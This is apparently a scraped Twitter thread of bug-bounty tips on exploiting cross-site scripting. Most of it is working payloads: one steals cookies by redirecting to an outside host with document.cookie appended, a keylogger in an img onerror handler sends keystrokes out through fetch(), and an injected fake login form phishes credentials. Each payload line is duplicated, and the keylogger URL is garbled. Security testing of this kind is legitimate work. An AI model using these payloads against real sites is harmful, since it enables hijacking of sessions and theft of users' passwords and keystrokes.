Read on Twitter
Here are a few ways to make the most of an XSS. Comment if you can think of some other ideas or resources! Thread 
.
.
Grab the victim's cookies by redirecting to an attacker's server and appending the cookie value, e.g.
document.location=' https://bugcrowd.com/?'+document.cookie
document.location=' https://bugcrowd.com/?'+document.cookie
Perform a sensitive action as the victim user (such as changing their password or email address). Having an XSS allows you to bypass SOP and Anti-CSRF mechanisms. See here for some payloads + inspiration: https://github.com/hakluke/weaponised-XSS-payloads
Plant a JavaScript keylogger (from https://github.com/swisskyrepo/PayloadsAllTheThings)
<img src=x onerror='document.onkeypress=function(e){fetch(" http://bugcrowd.com?k=bugcrowd.com/?k= "+String.fromCharCode(e.which))},this.remove();'>
<img src=x onerror='document.onkeypress=function(e){fetch(" http://bugcrowd.com?k=bugcrowd.com/?k= "+String.fromCharCode(e.which))},this.remove();'>
Redress the window with a fake HTML login form to phish credentials:
document.body.innerHTML = "<form action=' https://bugcrowd.com '><input type='text' value='email' name='email'><input type='password' value='password' name='password'><input type='submit'></form>"
document.body.innerHTML = "<form action=' https://bugcrowd.com '><input type='text' value='email' name='email'><input type='password' value='password' name='password'><input type='submit'></form>"
